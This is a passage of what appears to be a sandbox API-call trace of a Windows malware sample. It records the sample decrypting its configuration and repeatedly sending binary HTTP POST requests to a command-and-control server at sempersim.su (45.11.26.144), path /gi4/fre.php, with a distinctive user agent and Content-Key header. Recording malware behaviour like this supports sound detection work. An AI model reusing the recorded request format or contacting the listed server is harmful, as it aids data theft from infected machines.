dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1290) returned 0x34c [0229.522] Sleep (dwMilliseconds=0xea60) [0229.533] GetProcessHeap () returned 0x5b0000 [0229.533] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3590 [0229.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.534] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0229.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.542] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0229.554] GetProcessHeap () returned 0x5b0000 [0229.554] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0229.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.556] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0229.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.556] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0229.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.557] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.557] GetProcessHeap () returned 0x5b0000 [0229.558] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0229.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.559] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3590, pdwDataLen=0xdfcfc | out: pbData=0x5d3590, pdwDataLen=0xdfcfc) returned 1 [0229.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.560] CryptDestroyKey (hKey=0x5bde08) returned 1 [0229.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.561] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0229.561] GetProcessHeap () returned 0x5b0000 [0229.561] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0229.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0229.568] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0229.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0229.569] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0229.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0229.570] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0229.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0229.571] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0229.571] GetProcessHeap () returned 0x5b0000 [0229.571] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0229.571] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0229.571] GetProcessHeap () returned 0x5b0000 [0229.571] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0229.572] GetProcessHeap () returned 0x5b0000 [0229.572] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0229.572] GetProcessHeap () returned 0x5b0000 [0229.572] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3590 | out: hHeap=0x5b0000) returned 1 [0229.572] GetProcessHeap () returned 0x5b0000 [0229.572] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0229.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.573] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0229.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.582] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0229.588] GetProcessHeap () returned 0x5b0000 [0229.589] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0229.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.593] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0229.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.595] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0229.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.596] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.596] GetProcessHeap () returned 0x5b0000 [0229.596] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0229.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.598] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0229.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.599] CryptDestroyKey (hKey=0x5bde08) returned 1 [0229.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0229.601] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0229.601] GetProcessHeap () returned 0x5b0000 [0229.601] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d54c0 [0229.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0229.602] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0229.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0229.604] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0229.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0229.605] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0229.605] GetProcessHeap () returned 0x5b0000 [0229.605] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0229.605] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdac0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0229.611] GetProcessHeap () returned 0x5b0000 [0229.611] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa70 [0229.611] socket (af=2, type=1, protocol=6) returned 0x350 [0229.611] connect (s=0x350, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0229.693] FreeAddrInfoW (pAddrInfo=0x5cdac0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0229.693] GetProcessHeap () returned 0x5b0000 [0229.693] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5e60 [0229.693] GetProcessHeap () returned 0x5b0000 [0229.693] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0229.694] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0229.695] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0229.695] GetProcessHeap () returned 0x5b0000 [0229.695] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0229.695] GetProcessHeap () returned 0x5b0000 [0229.697] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0229.697] GetProcessHeap () returned 0x5b0000 [0229.697] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2f60 [0229.697] GetProcessHeap () returned 0x5b0000 [0229.697] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0229.698] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0229.700] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0229.700] GetProcessHeap () returned 0x5b0000 [0229.700] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0229.700] GetProcessHeap () returned 0x5b0000 [0229.701] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0229.701] send (s=0x350, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0229.703] send (s=0x350, buf=0x5d1e18*, len=159, flags=0) returned 159 [0229.703] GetProcessHeap () returned 0x5b0000 [0229.703] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0229.703] recv (in: s=0x350, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0231.140] GetProcessHeap () returned 0x5b0000 [0231.141] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0231.141] GetProcessHeap () returned 0x5b0000 [0231.141] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0231.141] GetProcessHeap () returned 0x5b0000 [0231.142] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0231.142] GetProcessHeap () returned 0x5b0000 [0231.142] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5e60 | out: hHeap=0x5b0000) returned 1 [0231.142] closesocket (s=0x350) returned 0 [0231.143] GetProcessHeap () returned 0x5b0000 [0231.143] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa70 | out: hHeap=0x5b0000) returned 1 [0231.143] GetProcessHeap () returned 0x5b0000 [0231.144] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0231.144] GetProcessHeap () returned 0x5b0000 [0231.144] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0231.144] GetProcessHeap () returned 0x5b0000 [0231.144] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0231.145] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xe10) returned 0x350 [0231.147] Sleep (dwMilliseconds=0xea60) [0231.156] GetProcessHeap () returned 0x5b0000 [0231.156] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0231.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.157] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0231.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.164] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5e60) returned 1 [0231.172] GetProcessHeap () returned 0x5b0000 [0231.172] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0231.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.190] CryptImportKey (in: hProv=0x5c5e60, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0231.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.191] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0231.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.192] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.192] GetProcessHeap () returned 0x5b0000 [0231.193] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0231.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.194] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0231.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.195] CryptDestroyKey (hKey=0x5be288) returned 1 [0231.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.196] CryptReleaseContext (hProv=0x5c5e60, dwFlags=0x0) returned 1 [0231.196] GetProcessHeap () returned 0x5b0000 [0231.196] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d56e8 [0231.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0231.197] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0231.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0231.198] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0231.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0231.199] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0231.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0231.200] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0231.200] GetProcessHeap () returned 0x5b0000 [0231.200] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0231.200] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0231.201] GetProcessHeap () returned 0x5b0000 [0231.201] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0231.201] GetProcessHeap () returned 0x5b0000 [0231.202] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d56e8 | out: hHeap=0x5b0000) returned 1 [0231.202] GetProcessHeap () returned 0x5b0000 [0231.202] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0231.208] GetProcessHeap () returned 0x5b0000 [0231.208] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0231.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.209] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0231.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.218] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0231.229] GetProcessHeap () returned 0x5b0000 [0231.229] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0231.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.230] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0231.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.231] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0231.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.232] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.232] GetProcessHeap () returned 0x5b0000 [0231.232] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0231.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.233] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0231.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.237] CryptDestroyKey (hKey=0x5bde08) returned 1 [0231.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0231.238] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0231.238] GetProcessHeap () returned 0x5b0000 [0231.238] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0231.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0231.239] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0231.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0231.240] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0231.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0231.241] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0231.241] GetProcessHeap () returned 0x5b0000 [0231.241] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0231.241] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdfe8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0231.244] GetProcessHeap () returned 0x5b0000 [0231.244] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca960 [0231.244] socket (af=2, type=1, protocol=6) returned 0x354 [0231.244] connect (s=0x354, name=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0231.313] FreeAddrInfoW (pAddrInfo=0x5cdfe8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0231.313] GetProcessHeap () returned 0x5b0000 [0231.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5e60 [0231.313] GetProcessHeap () returned 0x5b0000 [0231.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0231.314] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0231.315] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0231.315] GetProcessHeap () returned 0x5b0000 [0231.315] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0231.315] GetProcessHeap () returned 0x5b0000 [0231.316] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0231.316] GetProcessHeap () returned 0x5b0000 [0231.316] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3548 [0231.316] GetProcessHeap () returned 0x5b0000 [0231.316] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0231.316] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0231.317] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0231.317] GetProcessHeap () returned 0x5b0000 [0231.317] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0231.317] GetProcessHeap () returned 0x5b0000 [0231.317] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0231.317] send (s=0x354, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0231.318] send (s=0x354, buf=0x5d1e18*, len=159, flags=0) returned 159 [0231.318] GetProcessHeap () returned 0x5b0000 [0231.318] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0231.318] recv (in: s=0x354, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0232.372] GetProcessHeap () returned 0x5b0000 [0232.373] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0232.373] GetProcessHeap () returned 0x5b0000 [0232.373] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3548 | out: hHeap=0x5b0000) returned 1 [0232.373] GetProcessHeap () returned 0x5b0000 [0232.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0232.374] GetProcessHeap () returned 0x5b0000 [0232.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5e60 | out: hHeap=0x5b0000) returned 1 [0232.374] closesocket (s=0x354) returned 0 [0232.375] GetProcessHeap () returned 0x5b0000 [0232.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca960 | out: hHeap=0x5b0000) returned 1 [0232.375] GetProcessHeap () returned 0x5b0000 [0232.376] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0232.376] GetProcessHeap () returned 0x5b0000 [0232.376] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0232.376] GetProcessHeap () returned 0x5b0000 [0232.376] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0232.377] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1cc) returned 0x354 [0232.379] Sleep (dwMilliseconds=0xea60) [0232.390] GetProcessHeap () returned 0x5b0000 [0232.390] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0232.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.392] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0232.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0232.398] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0232.405] GetProcessHeap () returned 0x5b0000 [0232.405] 